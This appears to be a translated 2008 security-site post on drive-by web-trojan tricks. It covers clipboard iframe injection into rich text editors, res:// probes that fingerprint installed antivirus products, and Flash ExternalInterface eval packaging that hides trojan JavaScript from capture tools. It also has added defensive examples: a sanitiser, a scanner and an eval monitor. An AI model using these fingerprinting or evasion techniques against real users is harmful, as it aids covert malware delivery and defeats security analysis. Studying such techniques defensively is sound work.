Sneaky web-trojan (drive-by) tricks from xKungfoo - Vulnerability warning - Black Bar Safety Net

2008-11-24T00:00:00
ID MYHACK58:62200821188
Type myhack58
Reporter Anonymous
Modified 2008-11-24T00:00:00

Description

Author: cosine

Today was the last day of xKungfoo, and G gave a talk on web-trojan (drive-by) issues. Some of the sneaky drive-by tricks were not covered in detail, so they are disclosed here. In truth some of them are nothing special, just tricks that a few people have already played with.

First: the clipboard hijacking drive-by

This is a covert attack on rich text editors: when you paste text that was copied from elsewhere into a rich text editor, an iframe object is carried along with it into the editor, and that iframe loads the web trojan. A simple demo:

<iframe src=http://www.baidu.com/ height=110 width=110></iframe>
<script>
var iframe = document.getElementsByTagName("iframe")[0];
// IE-only: a control range can hold an element object, not just text
var rng = document.body.createControlRange();
rng.add(iframe);
// copies the iframe element itself to the clipboard
rng.execCommand('Copy');
</script>

This only works in IE6; how to extend it is left to the reader. Frankly, sneaky tricks like this are mostly for entertainment, and I doubt they see real use unless they get sneakier still.
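A defensive counterpart to the paste trick above, added here as an example (not code from the original post): an allow-list sanitiser that a rich text editor or its server side can run over pasted HTML, so that a smuggled iframe or script never reaches the stored content. The tag and attribute allow-lists, the URL rule and the sample payload are assumptions.

```javascript
// Added example (not from the original post): allow-list sanitiser for HTML that
// a rich text editor receives on paste. Unknown tags such as <iframe> and <script>
// are dropped, stray text is escaped, and only explicitly allowed attributes survive.
const ALLOWED_TAGS = new Set(['p', 'br', 'b', 'strong', 'i', 'em', 'u', 'ul', 'ol', 'li', 'a']);
const ALLOWED_ATTRS = { a: ['href'] };              // no on*= handlers, no style, no src
const SAFE_URL = /^(https?:\/\/|mailto:|\/|#)/i;    // rejects javascript:, vbscript:, data:
const TAG_RE = /<\/?([a-zA-Z][a-zA-Z0-9]*)([^>]*)>/g;
const ATTR_RE = /([a-zA-Z-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))/g;
// Elements whose bodies are never user content lose the body as well.
const DROP_BODY_RE = /<(script|style|iframe|object|embed)\b[^>]*>[\s\S]*?<\/\1\s*>/gi;

function escapeText(text) {
  return text.replace(/&(?!(?:[a-zA-Z]+|#\d+);)/g, '&amp;')
             .replace(/</g, '&lt;').replace(/>/g, '&gt;');
}

function keepAttrs(tag, attrText) {
  const allowed = ALLOWED_ATTRS[tag] || [];
  let kept = '';
  for (const a of attrText.matchAll(ATTR_RE)) {
    const key = a[1].toLowerCase();
    const val = (a[2] ?? a[3] ?? a[4] ?? '').trim();
    if (!allowed.includes(key)) continue;
    if (key === 'href' && !SAFE_URL.test(val)) continue;
    kept += ` ${key}="${escapeText(val).replace(/"/g, '&quot;')}"`;
  }
  return kept;
}

function sanitizePastedHtml(html) {
  const src = html.replace(DROP_BODY_RE, '');
  let out = '';
  let last = 0;
  for (const m of src.matchAll(TAG_RE)) {
    out += escapeText(src.slice(last, m.index));
    last = m.index + m[0].length;
    const name = m[1].toLowerCase();
    if (!ALLOWED_TAGS.has(name)) continue;          // unknown tag is dropped, text around it kept
    out += m[0][1] === '/' ? `</${name}>` : `<${name}${keepAttrs(name, m[2])}>`;
  }
  return out + escapeText(src.slice(last));
}

// Constructed clipboard payload of the kind the post describes (not a real site).
const PASTED = '<p>hello</p><iframe src=http://example.invalid/ height=110 width=110></iframe>'
  + '<script>alert(1)</script><a href="javascript:alert(1)" onclick="x()">link</a>';
console.log(sanitizePastedHtml(PASTED)); // <p>hello</p><a>link</a>
```

An unclosed `<iframe src=...>` with no end tag is handled too: the tag itself is dropped and only its following text survives.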

Second: using img tags from a remote domain to detect software installed locally

What local software would a web trojan want to detect? Nothing but security software: Kaspersky, Avira (the little red umbrella), 360 and 365 Menshen (an aside: 365 is not a knock-off, and its positioning is not the same as 360's). A stable demo:

<script>
////////////////////////////////////////////////////////
// Name: PoC for detecting local software from a remote domain via img tags
// Description: valid in the IE browser
// Author: Knownsec Team
// Date: 2008-11-03
////////////////////////////////////////////////////////
knownImg = {};
// each entry: the local software id and the address of an image resource via the res or file protocol
knownImg.resList = [
    {id: 'Avira', res: 'res://C:\\Program%20Files\\Avira\\AntiVir%20PersonalEdition%20Classic\\setup.dll/#2/#132'},
    {id: 'baidu', res: 'res://C:\\Program%20Files\\baidu\\Baidu%20Hi\\BaiduHi.exe/#2/#152'},
    {id: 'Super Rabbit', res: 'res://C:\\Program%20Files\\Super%20Rabbit\\MagicSet\\timedate.exe/#2/BBNO'},
    {id: '365Menshen', res: 'res://C:\\Program%20Files\\365Menshen\\menshen.exe/#2/#227'},
    {id: 'quicktime', res: 'res://c:\\program%20files\\quicktime\\which.exe/#2/#403'}
];
knownImg.ok_resList = new Array(); // ids of software confirmed to exist end up in this array
knownImg.tmp_resList = new Array();

knownImg.checkSoft = function(){ // detection function
    if (document.all){
        var x = new Array();
        for (var i = 0; i < knownImg.resList.length; i++){
            x[i] = new Image();
            x[i].src = "";
            knownImg.ok_resList.push(knownImg.resList[i].id); // push each resList id into ok_resList in turn
            x[i].onload = function(){
                //alert(knownImg.resList[i].id + ': return true');
            };
            x[i].onerror = function(){
                //alert(knownImg.resList[i].id + ': return false');
                // software does not exist: pop the corresponding id off ok_resList
                // (relies on IE firing onerror before the loop moves on; otherwise pop() removes the wrong id)
                knownImg.ok_resList.pop();
            };
            x[i].src = knownImg.resList[i].res;
        }
    }
};
knownImg.checkSoft();

alert(knownImg.ok_resList); // pop up the result
document.write('your system has the following software:<br />' + knownImg.ok_resList.join('<br />'));
</script>

This works on IE6/7/8. A few days after I finished this POC I was told that foreigners had already published one; the code above is what we worked out ourselves. At the time we did not really understand the res protocol either and asked some friends. Our POC is now extensible and very stable; you can modify it directly.
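For the monitoring side, an added example (not part of the original post or the Knownsec PoC): a small scanner that pulls res:// and file:// probe URLs out of captured page source and flags the pattern of several local-file probes combined with onload/onerror handling as software fingerprinting. The product paths in the sample are constructed, and the threshold of two distinct probes is an assumption.

```javascript
// Added example (not from the original post): find pages that probe the local disk
// through res:// or file:// image URLs, the fingerprinting pattern of the PoC above.
const LOCAL_PROBE_RE = /\b(res|file):\/\/([^'"\s<>)]+)/gi;

// Turn the captured URL into the Windows path it probes. In JS source the
// backslashes arrive doubled, and res:// carries /<type>/<id> after the file.
function normalizeProbe(scheme, rest) {
  let path = rest.replace(/\\\\/g, '\\');
  if (scheme === 'res') path = path.replace(/\/[^\/]*\/[^\/]*$/, '');
  try { path = decodeURIComponent(path); } catch (e) { /* keep raw on bad escapes */ }
  return path;
}

function extractLocalProbes(source) {
  const probes = [];
  for (const m of source.matchAll(LOCAL_PROBE_RE)) {
    const scheme = m[1].toLowerCase();
    probes.push({ scheme, path: normalizeProbe(scheme, m[2]) });
  }
  return probes;
}

// Verdict: two or more distinct local probes combined with onload/onerror handling
// is software fingerprinting, not an ordinary resource reference.
function assessFingerprinting(source) {
  const probes = extractLocalProbes(source);
  const distinct = new Set(probes.map(p => p.path.toLowerCase())).size;
  const usesHandlers = /\bon(?:error|load)\b/i.test(source);
  return { probes, distinct, suspicious: distinct >= 2 && usesHandlers };
}

// Constructed sample modelled on the PoC above; product paths are illustrative.
const SAMPLE = [
  "var x = new Image();",
  "x.onerror = function(){ found.pop(); };",
  "x.src = 'res://C:\\\\Program%20Files\\\\ExampleAV\\\\setup.dll/#2/#132';",
  "var y = new Image();",
  "y.src = 'res://C:\\\\Program%20Files\\\\ExamplePlayer\\\\player.exe/#2/#403';",
].join('\n');
console.log(assessFingerprinting(SAMPLE)); // suspicious: true, two probes
```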

Third: packaging the web trojan with Flash

This one is sneakier. We use server-side techniques to protect the web trojan, but however much we protect it, the trojan's JS code still gets caught by browser capture tools and is exposed. The principle is simple: no matter how the trojan checks Cookies, IP, referer and so on to protect itself, in order to harm the user it must eventually output JS for the browser to execute, and at that moment the trojan's JS is exposed. So is there no way to protect our trojan JS? There is......

We use Flash to package the web trojan, via the Flash AS extension API: the ExternalInterface class, which is the best way for AS to communicate directly with JS. For example, the following AS code:

import flash.external.*;
// the whole JS payload lives inside the SWF as one string; the page only ever sees the eval call
ExternalInterface.call("eval",
    "alert(document.domain);" +
    "function ajax(){" +
    "  var request = false;" +
    "  if (window.XMLHttpRequest) { request = new XMLHttpRequest(); }" +
    "  else if (window.ActiveXObject) {" +
    "    var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0', 'Msxml2.XMLHTTP.6.0', 'Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];" +
    "    for (var i = 0; i < versions.length; i++) { try { request = new ActiveXObject(versions[i]); } catch(e) {} }" +
    "  }" +
    "  return request;" +
    "}" +
    "var xhr = ajax();" +
    "function post_it(){" +
    "  var cmd = 'cmd=hi';" +
    "  xhr.open('POST', 'create_cmd.php', false);" +
    "  xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');" +
    "  xhr.send(cmd);" +
    "}" +
    "post_it();"
);

What is the principle behind the code above? The ExternalInterface class's call method directly invokes a JS function of the Flash container, here the HTML page. It takes two parameters: the first is the name of the JS function to call, the second is the parameter to pass to that function. What we are really doing here is hijacking eval, a JS built-in that can execute arbitrary JS code. By this principle, all of the JS code can be moved into the Flash file.

G used this method to successfully package the 06014 web trojan, and with our Flash compression and encryption protection, ordinary Flash decompilers cannot crack it; during the trojan's execution, browser capture tools cannot grab the trojan's JS code either. This gives good protection :)
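The eval hand-off is also the weak point of the Flash packaging, which the following added example (not from the original post) shows from the defender's side: a page-level hook that records every string passed to the global eval before it runs. It assumes ExternalInterface resolves the function name in the page's global scope, so a replaced window.eval is what the SWF ends up calling; the marker regexes and the demo payload are assumptions.

```javascript
// Added example (not from the original post): wrap the global eval so that code a
// plugin injects through ExternalInterface.call("eval", ...) is logged before it runs.
// Network-level capture never sees this code; the page's own eval always does.
const SUSPICIOUS_MARKERS = [
  /XMLHttpRequest|ActiveXObject/,        // builds a request object
  /\.open\s*\(\s*['"]POST/i,             // posts somewhere
  /document\.write|createElement\s*\(/,  // injects markup
];

// Replace scope.eval with a recorder; returns a function that restores the original.
function installEvalMonitor(scope, onCode) {
  const nativeEval = scope.eval;
  if (typeof nativeEval !== 'function') throw new TypeError('scope has no eval');
  scope.eval = function monitoredEval(code) {
    const text = String(code);
    onCode({
      length: text.length,
      markers: SUSPICIOUS_MARKERS.filter(re => re.test(text)).map(String),
      snippet: text.slice(0, 80),
    });
    // Indirect call: runs in global scope, which is what plugin-injected code expects.
    return nativeEval(code);
  };
  return () => { scope.eval = nativeEval; };
}

// Constructed demo on globalThis (in a browser this would be window).
function demo() {
  const seen = [];
  const uninstall = installEvalMonitor(globalThis, rec => seen.push(rec));
  // Stand-in for the kind of string the SWF above hands to eval (constructed).
  const injected = "function ajax(){ return new XMLHttpRequest(); } 40 + 2";
  const result = globalThis.eval(injected);   // the wrapper records, then runs it
  uninstall();
  return { result, seen };
}
console.log(demo());
```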

Fourth: the Web2.0-worm-style drive-by

That is to say, the traditional drive-by method with the greatest harm is mass SQL injection, injecting web trojans in bulk in a short time. We have still not seen Web2.0-worm-style drive-bys; we discussed this and concluded it is a matter of cost, not that nobody knows how: not everyone can easily write a Web2.0 worm. However, today at xKungfoo it was said that in the future it will become very easy for everyone to write XSS worms, because the anehta platform will provide packaged worm functions.

Web2.0 worms currently come in two forms: XSS worms and CSRF worms. A web trojan can perfectly well be mounted during the propagation of a Web2.0 worm. Some of the Web2.0 worms released before were jokes and did no harm, but don't think it will always be a hacker's joke. We believe this kind of drive-by will appear......

Well, that is the part of G's talk for today. Some of the sneaky tricks may be a challenge for our Webscan full-network monitoring system, but I believe ordinary drive-by operators do not use these sneaky skills, so treat them as entertainment.